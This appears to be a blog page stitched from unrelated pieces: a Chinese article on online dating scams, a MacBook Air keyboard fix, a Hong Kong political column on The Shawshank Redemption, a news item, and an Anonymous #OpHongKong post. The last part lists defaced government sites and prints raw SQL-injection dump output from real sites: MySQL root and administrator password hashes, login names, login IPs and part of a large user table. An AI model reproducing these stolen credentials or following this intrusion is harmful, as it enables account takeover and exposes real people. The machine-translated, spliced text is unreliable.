隨著約炮軟件的多樣化,除了在附近的人當中騙錢,還有騙感情的,例如附近的人當中的妓女,你以為她長得和APP中照片一個樣子,你以為你在和漂亮妹子約,其實和你聊得回复你的都是摳腳大漢。
根據出現頻率及各地夜店、酒吧的酒托數量,主觀認為全國各地這類團伙總計不下上萬。
 
網騙三:艷遇
從小老師就教我們看圖說話,小編看圖來說一說好了。
有一天我們去魔都出差,不管是QQ還是什麼,跟交費會員的打招呼總會靠譜一點吧,於是hi了一圈,誓要約變方圓5里炮。
於是。 “今天心情好,微信給你加吧”,“微信一般不加人”。 在於是就有了上面的對話(其實是我自己腦補的)。
一個自稱傳說中身高176家族企業繼承人某某戲劇學院舞蹈系大一新生出來約飯(Pao),這之前突然在淘寶看上一件衣服,就差¥136呢。
哥哥給個紅包唄~各種撒嬌各種騙。

拆穿:1, 都決定出來約飯了,發語音,視頻聊天先啊~ 2, 淘寶你妹啊,把寶貝連接發來啊,明顯微信發的寶貝截圖和實際店舖裡面的價格有出入,截圖時間都不對~ 3, 手機號(這個後面說)~ 4, 微信紅包以外的支付方式,例如QQ(查群庫),支付寶(男女認證)。
像這裡的QQ 210559792之前就是性別男。
有人會問為何聊這麼多,答案就是,說的越多就要為了圓前面的謊言撒更多的謊。 這裡的網騙說他閨蜜和媽媽在身邊,區區100塊錢都還用微信借? 去問信息中出現的"哥哥"的支付寶借100塊錢不是更快? 微信是隔天到賬呢。
除此以外,還有很多類似的行騙手法,例如“明天考試求祝福”“考試考砸了求安慰”“錢包丟了求贊助”....
總之,就是裝女神,裝可憐,裝艷遇,裝!

像上圖這個renbing1314這類大家可以試試,還沒開口就知道他想幹什麼的,都是能尋到可疑點的。
此類紅包騙子主要集中在滬浙閩蘇一帶,尤其以魔都重災區。
通過調查,行騙方式同樣是團伙形式,有專門負責買手機卡(黑卡)的,有專門負責註冊微信號的,還有專門維護微信朋友圈的,時不時的發動態,讓人覺得這真的是一個女神。 核心層也就是行騙層,屬於少數,通常幾個設備,輪換著登陸賬號聊天聊騷聊約炮,騙炮騙情騙紅包。
(這裡圖中微信男主角強烈要跟小編聲明,"為什麼遇到微信騙子的總是我?因為我的微信號只有4個字母,特容易被搜到")

好吧,前面的微信一條龍還沒說完,還有專門暴力窮舉微信註冊電話號碼和加好友的。
總結下來,根據這個一條龍的分工,要紅包的金額(開口就是¥188,張口就要¥136),主管推斷微信此類網騙金額會輕鬆達到百萬級。
網騙3:話費騙
陌陌公司最近提示用戶小心話費騙子,覺得新奇,於是我們特意調查了一番。
又發現一堆把自己裝成女神的人,發一些奇奇怪怪的附近動態,有圖中這種我的XXXXX快不行了,誰給我充話費啊幫幫我,怎麼怎麼著。

更多的動態像"X某某,我大老遠從哪哪哪跑來找你,你幹完我就跑了真他媽的禽獸,我話費都沒了,誰給我充話費我今晚就跟誰睡了。。。"
比這種逗比狀態更逗比的是,居然還有一堆人在後面回复,"妹妹來哥哥這裡","美女什麼情況,私聊"。
行騙手段也是今年新興起來的,搞一堆外地手機號,通過網上營業廳等方式辦理"停機保護​​",撥打的時候聽到的是停機,然而實際並未欠費,利用的是他人的同情(後來變成約炮誘惑),不管你充100還是1萬給他,這個手機號都是停機的。 等被騙的大家給這個手機號充滿了100塊的話費,團伙就50塊錢把卡賣掉,有土豪充了1000那就更刺激了。
這種行騙根據陌陌的物理位置漫遊,基本上現在一二三線城市全有,甚至個別小鄉鎮也出現了,主管估計這種團伙也可以按千算。

中國人民的智慧真是無窮無盡,該用在正途的心思都花到歪腦筋上面了,當然小編除了說騙子團伙外,還有網警。
收復邊疆光復海外全靠城管了,然而對內給政府當狗控制輿情除了網警也是沒誰了。 就是真養條狗,被騙子騙了讓狗上去咬也能汪汪兩聲。
總結:
打擊網騙就不指望那些給政府控制輿情的網警狗了,防火防盜防網騙還需靠自己。
作為網絡安全從業者,網絡是自己的本家,應該以娛樂精神來玩壞網騙,推薦閱讀:兩步5分鐘確定釣魚網站入手點http://bbs.blackbap.org/thread-7688-1- 1.html
//Silic.Org


 =====
 http://www.zhoushuguang.com

014 Tuesday, June 17


Macbook Air's keyboard and touchpad all the failures of the solution !

 I have a used Macbook Air, 2008 year, should be the first generation of Macbook, I spent a lot of years, and then not in use for some time, then battery discharge, the battery will swell, and I take down the battery, also can be used only with external power supply. Now travel only occasionally this may be the only band in the history of the most lightweight Macbook Air battery-free version :)

Recent want bring the ball, the results of the keyboard and touchpad all the failures, which key to press did not use, the touchpad also fails, reboot useless.

Internet search to this solution, it really solve my problem, keyboard touchpad restored, but Apple's Knowledge Base said that " Intel-based Mac: Resetting the System Management Controller (SMC) "completely without any key mention the word "Keyboard failure" and "touchpad failure" of the word, who can search get ah? So I wrote a record, hoping to help to encounter the same problems.
http://support.apple.com/kb/HT3964?viewlocale=zh_CN&locale=zh_CN
Can not disassemble the battery is equipped with a portable computer includes a MacBook Pro (Early 2009) and later models, all models of MacBook Air and MacBook (2009 year-end).
  1. Turn off the computer.
  2. The MagSafe power adapter is connected to the power supply and Mac (if not already connected).
  3. In the built-in keyboard, press (left) Shift-Control-Option keys and the power button.
  4. Simultaneously release all the keys and the power button.
  5. Press the power button to turn on the computer.
    NOTE: Restoring SMC settings, LED indicator MagSafe power adapter may change state or temporarily closed.


Simultaneously press (left) Shift-Control-Option keys and the power button will not have any sound or light reaction, but then turn be able to use the keyboard and touchpad.

Apple's Knowledge Base, said the Intel-based Mac, System Management Controller (SMC) is responsible for managing a lot of low-level functions. These features include:
  • Press the power button on the operation to respond
  • On the display screen on a portable Mac to respond to the opening and closing lid
  • Battery Management
  • Thermal Management
  • SMS (Sudden Motion Sensor)
  • Ambient light sensor
  • Keyboard backlighting
  • Status Indicators (SIL) management
  • Battery status indicator
  • Select the external (not internal) video source for some iMac displays
But it seems not say SMC managed keyboard and touchpad ah. Regardless of the matter, anyway, this way to solve my problem, and those who encounter the same problem, try to shut down and turn on the power state while pressing the (left) Shift-Control-Option keys and the power button bar.


 =====
 http://www.zhoushuguang.com
 
  2014年6月17日星期二
的Macbook Air的鍵盤和觸控板全部失靈的解決辦法 !

 我有一台二手的Macbook Air,2008年的,应该是第一代Macbook,用了很多年了,然后有一段时间没在用,然后电池过放了,电池就膨胀了,我把电池取掉,只用外接电源也 能用。现在也只是偶尔旅行才带上这台可能是史上最轻便的Macbook Air无电池版本:)

最近想拿来看球,结果键盘和触控板全部失灵,按哪个键都没用,触控板也失灵,重启也没用。

上网搜索到这个解决办法,果然解决了我的问题,键盘的触控板恢复了,但苹果的知识库上说是“基于 Intel 的 Mac:重置系统管理控制器 (SMC)”完全没有任何关键字提到“键盘失灵”和“触控板失灵“的字样,谁能搜索得到啊?所以我写个记录,希望能帮助到遇到同样问题的人。
http://support.apple.com/kb/HT3964?viewlocale=zh_CN&locale=zh_CN

装有不可自行拆卸电池的便携式电脑包括 MacBook Pro(2009 年初)及更新机型、所有型号的 MacBook Air 和 MacBook(2009 年末)。
  1. 关闭电脑。
  2. 将 MagSafe 电源适配器连接到电源和 Mac(如果尚未连接的话)。
  3. 在内建键盘上,同时按下(左侧)Shift-Control-Option 键和电源按钮。
  4. 同时松开所有键和电源按钮。
  5. 按下电源按钮打开电脑。
    :还原 SMC 设置时,MagSafe 电源适配器上的 LED 指示灯可能会更改状态或暂时关闭。


同时按下(左侧)Shift-Control-Option 键和电源按钮不会有任何声音或光的反应,不过再开机就能用上键盘和触控板了。
苹果的知识库上说,在基于 Intel 的 Mac 上,系统管理控制器 (SMC) 负责管理很多低级功能。这些功能包括:
  • 对按下电源按钮的操作做出响应
  • 对便携式 Mac 上显示器屏幕盖的开合做出响应
  • 电池管理
  • 热能管理
  • SMS(突发移动感应器)
  • 环境光度感应
  • 键盘背光
  • 状态指示灯 (SIL) 管理
  • 电池状态指示灯
  • 为有些 iMac 显示器选择外部(而非内部)视频来源
但好像没说SMC有管理键盘和触控板啊。不管啦,反正这个方法解决我的问题了,如果谁遇到同样的问题,试试关机并接通电源状态下同时按下(左侧)Shift-Control-Option 键和电源按钮吧。

 =====
 http://hk.apple.nextmedia.com/news/art/20151107/19363563
 



 1994 movie "The Shawshank Redemption" (The Shawshank Redemption) poorly at the box office, although eligible for seven Oscar nominations, and ultimately do not get any prizes. Unexpectedly Later in the DVD and television replay of the secondary market has gained great success in the history of the Internet Movie Database (IMDb) best 250 movie fans named, has been and "The Godfather" in the first, second among jingle horse . And two decades of history, eventually becoming bad. Undoubtedly, the film has been rated one of the best movies of film history. Recently, a friend sent to author DVD, after watching the feelings of many.
 
The story of a banker who has been wronged to kill Andy (Andy), was sentenced to life imprisonment and sent to the "shark fort" (Shawshank) prison. In prison he saw the jailer of the new prisoners beaten to death, but the corruption mouthful Bible God brutal warden, gang rape other inmates evil prisoners. Among them, he earned a small profit with smuggled cellmate "red head" (Red) are now friends. With his wit and wealth of financial knowledge, for long prison guards, jailers were tax returns, but also help clean the warden at the prisoners come from the press black money, to gain confidence, by better treatment (not to be sexual assault and was transferred to library services). After 20 years of captivity, he with hope, perseverance and successful escape.

People's habits are formed in the system

Movie content-rich, user-friendly in-depth characterization, dialogue fine police, Wikipedia even has a "Shawshank Redemption quotations." Here I choose to talk about one paragraph. That is "red head" saying: "These walls are kind of funny just jail time, you hate walls around; slowly, you get used to living in them; eventually you'll find yourself having to rely on. It is survival. This is institutionalized. "
 
Nobody likes prison walls, warders tyranny, does not make sense to speak of repression, especially lifers despair, at the beginning there is no thought to the habit of prison life prisoner. However, no matter how hated the day always before, we have to accept the unacceptable, then slowly forced to get used to high pressure, accustomed to prison small community. Ten, twenty, thirty years later, people will become dependent on this illiberal regime to survive, one was closed 50 years old prisoner, actually due to inability to adapt to life outside suicide after release. This is the man in a non-human system can not help but getting used to gradually adapt "institutionalized", which is to become a part of the system.
 
A lack of social freedom and human rights, in fact, tantamount to a large prison. Prison inmates make institutionalized, it's also big jail people institutionalized. Andy said: "The funny is that on the outside, I was upright before I went to prison to be a bad person.." Because under high pressure does not go crooked road, improper bad guys would not survive. Similarly, under the regime of violence lie fake fake a thing full of life, a good person is not even their own protection. Therefore, to see the old man in the street fall, you can not go arm; see the child hit by a car you can not go to rescue, otherwise you will get into trouble. Many people could not understand the mainland Let habits, it is under the regime of formation.
Former Czech President Vaclav Havel (V Saki clav Havel) in his book "powerless power" in a totalitarian society of the most classic statement: "Society is full of hypocrisy and lies: government bureaucracy called the people's government; the working class enslaved under the ownership of the name of the working class; complete loss of personal status person said to be the ultimate liberation; deprivation news channels people are called to protect people's news channels; with the power to control the people said to the people in power ; abuse of power, the rule of law is overbearing; culture is the development of cultural repression; there is no freedom of speech freedom of speech is the highest; the highest democratic election farce; prohibition of independent thinking is the most scientific worldview ...... authoritarian politics under everyone can only survive in a lie. People do not have to accept the lies, they bear a lie and a lie in the company of life, that was enough. It was recognized that this is such a system, improve the system, created this system, into this system. "

Everyone is his own God

In a country ravaged by more than two systems, Hong Kong people as innocent jail Andy. We started to resist the autocratic political lie on one country, slowly had no choice but to accept. You do not believe Mr. Leung about his interpretation charge of HK $ UGL5,000 square, do not accept the Port Authority Colonel shameless members who violate common sense arguments, do not accept the false elections, lead the water almost every day, and so absurd, you just have no choice but to accept " and lies and lies in the company of life, that's enough. "; so you've just" confirmed the system, improve the system, created this system, this system becomes. " If this continues, we'll pack of lies as to adapt to the rule of law system, there is no freedom like the mainland, and eventually have to rely on the survival of this absurd system. Now, not many people in Hong Kong have been building this system can not be separated in this system yet?
 
However, "The Shawshank Redemption," the whistle tells us another possibility is that in seeing never possible under the circumstances, is freedom, hope traction, people can determine their perseverance and courage out of the walls, fluttering flight. "Some birds are caged, their wings are too brilliant a" Hong Kong people was and should still be rich bird feather glorious it.
Everyone is his own God. If you have to give yourself up, who will save you? Everyone is busy, busy, some students, some busy dying. Busy fame of your busy daily necessities of you, stop to think about: your brain is not already been institutionalized? You have to give up or to fight in the end? (Https://www.facebook.com/mrleeyee)

Li Yi published Monday to Saturday


 =====
 http://hk.apple.nextmedia.com/news/art/20151107/19363563
 
 










1994年的電影《月黑高飛》(The Shawshank Redemption)票房不佳,雖獲七項奧斯卡提名,最終得不到任何獎項。誰料其後在DVD和電視重播的第二市場卻獲得巨大成功,互聯網電影數據庫 (IMDb)的史上最佳250部電影影迷評選中,一直和《教父》在第一、第二名間叮噹馬頭。而且二十年來歷久不衰。毫無疑問,這部電影已被評為影史最佳電 影之一。最近,友人送筆者DVD,看後感受甚多。

故事講一位被冤枉殺人的銀行家安迪(Andy),被判無期徒刑並送入「鯊堡」 (Shawshank)監獄。在獄中他見到獄吏把新囚犯活活打死、滿口聖經上帝卻又貪瀆殘暴的典獄長、糾黨強暴其他囚犯的惡囚。其中,他與走私貨物而賺取 小利的獄友「紅頭」(Red)成為好友。他憑着機智及豐富的理財知識,替獄警長、獄卒們報稅,又幫助典獄長清洗從壓榨囚犯處得來的黑錢,從而獲得信任,受 到較佳的待遇(不被性侵和被調到圖書館服務)。在經過20年的囚禁後,他憑着希望、毅力而成功逃獄。

人的習性在體制下形成

電影內容豐富、人性刻畫深入,對話精警,維基甚至設有「月黑高飛語錄」。這裏筆者選其中一段來談談。那是「紅頭」說的話:「監獄裏的高牆實在是很有趣。剛 入獄的時候,你痛恨周圍的高牆;慢慢地,你習慣了生活在其中;最終你會發現自己不得不依靠它而生存。這就是體制化。」

沒有人喜歡監獄的高牆,獄吏 的暴虐,沒有道理可講的壓制,尤其是被判無期徒刑者的絕望,開始時沒有囚徒認為可以習慣監獄生活。然而,不管如何痛恨,日子總要過,不能接受也得接受,於 是慢慢就被迫習慣了高壓,習慣了監獄的小社會。十年、二十年、三十年之後,人就變成要依賴這個不自由的體制才能生存,一個被關了50年的老囚犯,獲釋後竟 因無法適應外間生活而自殺。這就是人在一個非人體制下由不得不適應而逐漸習慣逐漸「體制化」,也就是成為體制的一部份了。
一個沒有自由和人權的社 會,事實上等於是大監獄。監獄會使囚犯體制化,大監獄也會使它的人民體制化。安迪說:「搞笑的是,在外頭,我剛正不阿。我到監獄裏來才會當個壞人。」因為 在高壓之下不走歪路、不當壞人就無法存活。同樣,在一個假話假貨假事充斥的暴力政權之下生活,做一個好人是連自己都不能保護的。因此,見到老人在路邊跌 倒,你不能去攙扶;見到小孩被車撞倒你不能去施救,否則就會惹禍上身。大陸人許多讓我們看不慣的習性,正是在體制化之下形成的。

捷克前總統哈維爾 (V咲clav Havel)在他的著作《無權力者的權力》中,對極權社會有最經典的論述:「虛偽與謊言充斥着社會:官僚政府叫作人民政府;工人階級在工人階級當家作主的 名義之下被奴役;個人地位的徹底喪失說成是人的最終解放;剝奪人民的新聞渠道被稱為保障人民的新聞渠道;用權勢駕馭人民說成是人民掌握權力;濫用職權、專 橫跋扈便是實行法治;壓制文化就是發展文化;毫無言論自由就是最高的言論自由;選舉鬧劇是最高的民主;禁止獨立思考是最科學的世界觀……專權政治下每個人 都只能在謊言中求生。人不必去接受謊言,他們承受在謊言中和與謊言為伍的生活,這就夠了。就是這樣人們確認了這個制度,完善這個制度,製造了這個制度,變 成了這個制度。」

每個人都是自己的上帝

在一國大於兩制的蹂躪下,香港人也正如無辜被關進監獄的安迪。開始時我們抗拒專權政治關於一國兩制的謊言,慢慢就不得不無奈接受。你不必相信梁振英關於他 收取UGL5,000萬港元的解釋,不必接受港大校委會那些無恥成員違反常識的議論,不必接受假普選、鉛水等等無日無之的荒謬,你只要無奈接受「在謊言中 和與謊言為伍的生活,這就夠了」;這樣你就等於「確認了這個制度,完善這個制度,製造了這個制度,變成了這個制度」。這樣下去,我們會像大陸人那樣適應沒 有自由法治的假話連篇的體制,最後變成要依靠這荒謬體制存活。現在,不是已經有許多香港人在構建這個體制也離不開這個體制了嗎?

然而,《月黑高飛》的終場告訴我們另一個可能,就是在眼看決不可能的情況下,被自由、希望牽引着,人可以憑毅力和勇氣衝出高牆,振翼高飛。「有些鳥是關不住的,牠們的羽翼太光輝了」,香港人過去是、現在應該仍然是羽毛光輝豐盛的鳥吧。
每個人都是自己的上帝。如果你自己都放棄自己了,還有誰會救你?每個人都在忙,有的忙着生,有的忙着死。忙着追名逐利的你,忙着柴米油鹽的你,停下來想一下:你的大腦,是不是已經被體制化了?你要放棄還是要抗爭到底?(https://www.facebook.com/mrleeyee

李怡
周一至周六刊出


 =====


 Comments]] -
Annie Choi]] -
"A lack of social freedom and human rights, in fact, tantamount to big prison."

=====

評論]]-
Annie Choi]]-
"一個沒有自由和人權的社會,事實上等於是大監獄。"

=====


*
-Update[07/11-2015] Anonymous and hacker tribe - cause us a lot of curiosity...! - Add Hong Kong Apple Daily our favorite famous columnist writer Mr. Li Yi's brilliant comment! look at Hong Kong today,, Taiwan tomorrow, garbage Ma Ying-jeou betrayed us Taiwan people us,! we do not want this dirty Ma Ying-jeou, the most suitable for this crap dead in the mainland!
-更新[07/11-2015]黑客與匿名部落--引起我們很多好奇之...!-加上香港蘋果日報我們最喜愛的著名專欄主筆李怡先生的精采評論!看今日香港,,明日台灣,垃圾馬英九出賣我們台灣人們,我們不要骯臟的馬英九,這垃圾死在內地最適宜!-

 http://melody-free-shaing.blogspot.com/2015/11/4-11-2015-update-1-in-november-it-is.html

 ===############################################













 
 明報即時新聞
2小時 · 
 Ming Pao Daily News Breaking News
2 hours *
Hot words] [Online French program sing Cantonese songs, led the congregation in Hong Kong immigration legal sing "I would also like you to enjoy with Tam Chun-ying cover flutter" http://bit.ly/1WGGqmU

 【網上熱話】法國節目唱廣東歌 港移民率領眾法人唱「還願你跟我盡情擔遮扑振英」 http://bit.ly/1WGGqmU
 November 7, 2015 Saturday]] -Hot words] [Online French program sing Cantonese songs, led the congregation in Hong Kong immigration legal sing "I would also like you to enjoy with Tam Chun-ying cover flutter" (14:39).
Many Hong Kong residents immigrated heart of Hong Kong, Hong Kong is still very concerned about the community, the artist moved to France Sony Chan is one of them. He recently in the local "France2" television program, and a public French artists in French and Cantonese chorus, which is more irony Chief Executive Leung Chun-ying and a few sentences Communist lyrics, including "I would also like you to enjoy with Tam Chun-ying cover flutter."
In this one called "Folie Passagère" aired this week on the three programs, Sony Chan led a French performers, including the 1998 French World Cup winner, former Chelsea defender Frank Leboeuf (Frank Leboeuf) sing together .
I saw a French public followed the French alphabet on the screen, singing "the former very beautiful piece of Hong Kong, you can whole life credit", "give me what classes Wuxin lose the Communist Party" and "尤其振 Britain epilepsy was vomit more electricity." etc. Cantonese lyrics.When the 1997 return of Hong Kong, Sony Chan moved with his family to France. He later studied architecture architect worked thereafter as artists, appeared on the show. He is a man physically, but wearing women's clothing, and to show his female identity.Movie: 3:20 Start]] -[Abreast of the latest news, please Like "Ming Pao instant news" special page fb! http://www.facebook.com/mingpaoinews] -Kill this rubbish theif wolf #689 beast! Fuck!
Ming Pao Daily News Breaking NewsMedia / News / Publishing · 224,094 a praise good· 10 hours ·[Han hard, as ......] por: call it a day after the Department first thing most want Fanwuqifen sleep.Short + report: http://bit.ly/1NxKsxA (Liu Jun-Tao Chang).
Techtronic Board grants as expected today Bei Legislative Council Finance Committee approved, though ...news.mingpao.com

【網上熱話】法國節目唱廣東歌 港移民率領眾法人唱「還願你跟我盡情擔遮扑振英」 (14:39)

不少移居外國的港人心繫香港,仍然非常關心香港社會,移居法國的藝人Sony Chan便是其中一位。他日前在當地的「France2」電視台節目上,與一眾法國藝人用法文和廣東話合唱,當中更有數句諷刺特首梁振英及中共歌詞,包括「還願你跟我盡情擔遮扑振英」。
在該個名為「Folie Passagère」、本周三播出的節目上,Sony Chan率領一眾法國表演者,包括1998年法國世界盃冠軍隊成員、前車路士後衛拿保夫(Frank Leboeuf)一同獻唱。
只見一眾法國人跟着螢幕上的法文拼音,唱出「從前極美的一片香港,能全為你畢生增光」、 「唔信會輸畀呢班共產黨」和「尤其振英更癲得嘔電」等廣東話歌詞。

1997年香港回歸時,Sony Chan隨家人移居法國。他修讀建築後曾任職建築師,其後擔任藝人,在節目中亮相。他在生理上是一名男性,但常穿女性服裝,並以女性身份示人。
短片:3:20開始
 http://bit.ly/1WGGqmU

明報即時新聞
媒體/新聞/出版 · 224,094 個讚好
· 10小時 ·
【咁辛苦,不如......】陳健波:收工之後第一件事係最想返屋企瞓覺。
短片+報道: http://bit.ly/1NxKsxA (劉焌陶攝)

創科局撥款一如所料今日喺立法會財委會上獲通過,雖然…
 

 =====




#OpHK

 @OpHongKong
@AnonymousGlobo
<Our friendly Great Anonymous^
webchat.anonops.com channel : #OpHongKong
---------------------------------------------------------------------------------------------------------------------------------------
In the great tradition of civil disobedience, We, Anonymous, declared war on injustice  a few years ago. Once again the Chinese government strikes hard at its own people. At this very moment Chinese police forces are hurting innocent citizens who cry for liberty.
Since we are many and we do not fear ANY abusive government or institution in the globe, we also declared war against the Chinese Government, well known for its authoritarian posture. We are only targeting .gov.cn and .gov.hk .mil.cn in opposition to their oppressive ways. We emphatically condemn those attacks against non governmental or non military targets.
We stand in solidarity with the citizens of Hong Kong.
---------------------------------------------------------------------------------------------------------------------------------------
Websites has defaced:
http://www.tielingws.gov.cn/
http://www.bys.gov.cn/index.html
http://www.tongcheng.jcy.gov.cn/Xnitro.html
http://qxj.km.gov.cn/hector.html
Database belong to us:
www.gyx.gov.cn
web application technology: Apache
back-end DBMS: MySQL 5.0
available databases [2]:
[*] hdm0460401_db
[*] information_schema
Database: hdm0460401_db
[4 tables]
+-------------------------+
| siyueq1w2e3r4_leaveinfo |
| sy_admin                |
| sy_advert               |
| sy_advert_              |
+-------------------------+
Database: hdm0460401_db
[10 tables]
+-------------------------+
| siyueq1w2e3r4_leaveinfo |
| sy_admin                |
| sy_advert               |
| sy_advert_              |
| sy_article              |
| sy_column               |
| sy_config               |
| sy_diaocha              |
| sy_feedback             |
| sy_link                 |
+-------------------------+
Database: hdm0460401_db
[18 tables]
+-------------------------+
| siyueq1w2e3r4_leaveinfo |
| sy_admin                |
| sy_advert               |
| sy_advert_              |
| sy_article              |
| sy_column               |
| sy_config               |
| sy_diaocha              |
| sy_feedback             |
| sy_link                 |
| sy_menu                 |
| sy_options              |
| sy_page                 |
| sy_photo                |
| sy_question             |
| sy_survey               |
| sy_user                 |
| sy_wenjuan              |
+-------------------------+
Database: hdm0460401_db
Table: sy_admin
[10 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| Email      | varchar(64) |
| ID         | int(8)      |
| LoginCount | int(8)      |
| LoginIP    | varchar(64) |
| LoginName  | varchar(16) |
| LoginTime  | datetime    |
| Password   | varchar(64) |
| RealName   | varchar(16) |
| Remark     | text        |
| Role       | text        |
+------------+-------------+
Database: hdm0460401_db
Table: sy_admin
[20 entries]
+----------------------------------+-------------+
| Password                         | LoginName   |
+----------------------------------+-------------+
| 0007ec88e55dab4ab539bbad519103be | zhujianju   |
| 052914798edea9d0909d00a442d9af25 | xinfangju   |
| 06cc46754cfbff3a24efedc882ad538b | laoganbuju  |
| 0b28e69bc8498d6c9f3ae3c80beb73f1 | zhijianju   |
| 0b3c1af353bd2c6e9a6c251073cabbc7 | fulianhui   |
| 0daaee6a25a7b34d96fe6d36ed2dda04 | xianweiban  |
| 0ed4e997e7cc081c6405aeb5559f42ea | dishuiju    |
| 10db6c65c1caed26e4461014a3117457 | xzzx        |
| 16f50a3752ac6c2ee0ffffae0c01e488 | nonggongwei |
| 1d4253f126eaf9db3f8d1f9b5fae83db | dianshitai  |
| 22f78dcfdfa7c4b15da9beade0423097 | zuzhibu     |
| 234b181fc544f9628c244bf742602659 | wtzx        |
| 2b94354cca6efaf1ef5e09bee7b43bdb | xiangonghui |
| 38ffd85b0972b5929b236ac0d6d6f37c | zfshen1     |
| 39633125692725af8315546980aaa2e0 | gyxxfj      |
| 3af9f18bc7f32f29f1de5be83f737e66 | zhengfuban  |
| 3de76fd2ef6aaf094493e3ed6c708cb3 | dangshiban  |
| 41073e4695cdfff1ffbc76eaff2336d8 | nongmuju    |
| 426375021743691b060ea9a816e29455 | gongshangju |
| 450a25d0278538a4ab37bad64d6deb80 | xuanchuanbu |
+----------------------------------+-------------+
 http://www.tanbu.gov.cn
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, PHP 5.2.13, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0
database management system users [2]:
[*] 'root'@'%'
[*] 'root'@'localhost'
database management system users password hashes:
[*] root [1]:
    password hash: *056C8E28E452A0A98F43B9D896B281078E56630F
available databases [5]:
[*] information_schema
[*] mysql
[*] supertanbu
[*] test
[*] yitie
Database: mysql
[24 tables]
+---------------------------+
| user                      |
| columns_priv              |
| db                        |
| event                     |
| foo                       |
| func                      |
| general_log               |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| ndb_binlog_index          |
| plugin                    |
| proc                      |
| procs_priv                |
| servers                   |
| slow_log                  |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
+---------------------------+
Database: mysql
Table: user
[2 entries]
+--------+-------------------------------------------+
| User   | Password                                  |
+--------+-------------------------------------------+
| root   | *056C8E28E452A0A98F43B9D896B281078E56630F |
| root   | *056C8E28E452A0A98F43B9D896B281078E56630F |
+--------+-------------------------------------------+
Database: supertanbu
[27 tables]
+-------------------+
| area              |
| base_info         |
| channel_functions |
| channel_publish   |
| channels          |
| deliver_add       |
| enterprise        |
| group_user        |
| language_version  |
| mall_aboutus      |
| mall_contactus    |
| messages          |
| messages_         |
| mobile_code       |
| my_codes          |
| news_email        |
| news_publish      |
| pic               |
| product_publish   |
| product_sort      |
| temp_emails       |
| tuan_orders       |
| tuan_orders_num   |
| tuan_products     |
| users             |
| videos            |
| vote              |
+-------------------+
Table: users
[5 entries]
+-------+-----------------+----------------------------------+
| Power | UserName        | Password                         |
+-------+-----------------+----------------------------------+
| 1     | simonshawn      | 637094986520c347542f2f5aec0981fc |
| 3     | Őţ\xceńżĆ       | 96e79218965eb72c92a549dd5a330112 |
| 3     | \xcdś\xd7ĘżĆ    | 96e79218965eb72c92a549dd5a330112 |
| 3     | \xc2Ă\xd3\xceżĆ | 96e79218965eb72c92a549dd5a330112 |
| 1     | xia             | 96e79218965eb72c92a549dd5a330112 |
+-------+-----------------+----------------------------------+
Database: yitie
[72 tables]
+--------------------+
| returns            |
| area               |
| base_info          |
| channel_functions  |
| channel_publish    |
| channels           |
| comments           |
| deliverlist        |
| get_focus          |
| hy_ad              |
| hy_admin           |
| hy_category        |
| hy_city            |
| hy_comabout        |
| hy_comad           |
| hy_comcategory     |
| hy_comcomments     |
| hy_comcoupons      |
| hy_comments        |
| hy_commessage      |
| hy_commontel       |
| hy_commonweb       |
| hy_comnews         |
| hy_comonline       |
| hy_comphotos       |
| hy_comproduct      |
| hy_comtemplate     |
| hy_consume         |
| hy_consume_import  |
| hy_favorites       |
| hy_help            |
| hy_helpcategory    |
| hy_industry        |
| hy_info            |
| hy_inforeport      |
| hy_ipdata          |
| hy_ipdatanew       |
| hy_label           |
| hy_labelcategory   |
| hy_link            |
| hy_message         |
| hy_news            |
| hy_newscategory    |
| hy_options         |
| hy_picupdateinfo   |
| hy_productcategory |
| hy_productorder    |
| hy_recharge        |
| hy_search          |
| hy_setup           |
| hy_template        |
| hy_templatedata    |
| hy_upfile          |
| hy_user            |
| hy_user_import     |
| hy_userface        |
| hy_webcategory     |
| language_version   |
| navdisplay         |
| navdisplay1        |
| news_publish       |
| pbcatcol           |
| pbcatedt           |
| pbcatfmt           |
| pbcattbl           |
| pbcatvld           |
| porders            |
| product_color      |
| product_pic        |
| product_size       |
| returnpic          |
| shai               |
+--------------------+
Table: hy_admin
[11 entries]
+----------------+------------------+------------------+
| A_LoginIP      | A_UserPass       | A_UserName       |
+----------------+------------------+------------------+
| 36.250.225.47  | 6520c347542f2f5a | admin            |
| 120.197.64.11  | 8a63938a1f1895c3 | xinwen           |
| NULL           | 028943d587f463cd | xxbj             |
| 58.67.137.193  | 028943d587f463cd | xinxish          |
| 112.91.70.213  | 965eb72c92a549dd | anhuichaohu      |
| 58.67.137.193  | 965eb72c92a549dd | guangzhouconghua |
| 120.197.64.11  | 00c67b55ed083b2b | 10000            |
| 58.253.216.194 | 0d9518c13ed26169 | 10001            |
| NULL           | 21684142219402f2 | sai              |
| 120.197.64.11  | 83f150c81d28979e | yangmj           |
| NULL           | f8b08a4f865a9970 | simon.shawn      |
+----------------+------------------+------------------+
Database: yitie
Table: hy_user
[5358 entries]
+---------------------------------------+-----------------------------------------------------+-------------+
| U_UserPass                            | U_UserName                                          | U_AuthEmail |
+---------------------------------------+-----------------------------------------------------+-------------+
| Ďľ\xcdłąŁ\xc1\xf4\xceޡ\xa8ľ\xc7\xc2ź | \xd3\xceż\xcd                                       | 0           |
| ac0541311f84ec36                      | 888888                                              | 0           |
| 0c397f1532068e2c                      | 371567139                                           | 2           |
| 93471ec5749c359f                      | felinal                                             | 0           |
| cc943a57615a1266                      | lyg1225                                             | 0           |
| 0d8d0b60a8c4e9dd                      | ş\xcdŇť\xc9Ěąę\xd7\xa8Ŕű\xb4\xfaŔ\xed               | 0           |
| c548ede5973a63fd                      | \xb0\xd7ĚěśđĂŔČ\xddŃř\xc9\xfaš\xdd                  | 0           |
| bf6b3b3ec144088b                      | leonardren                                          | 0           |
| 1dbf6af85f31021d                      | wenaswenzi                                          | 0           |
| ac59075b964b0715                      | \xcd\xa8ĐĹ\xd6ŽźŇ                                   | 2           |
| fa69df218cbccdb1                      | ˇ˘Ď\xd6Ŕńơ                                         | 0           |
| 77804d2ba1922c33                      | \xd4řČ\xa8Ő\xf7                                     | 0           |
| 14a5094b41f7212a                      | šă\xce\xf7\xd3ń\xc1\xd6                             | 0           |
| 8a5cbff90cf09474                      | yicheng2011                                         | 0           |
| c9dbc224e53d38af                      | lgzyzxc0906                                         | 0           |
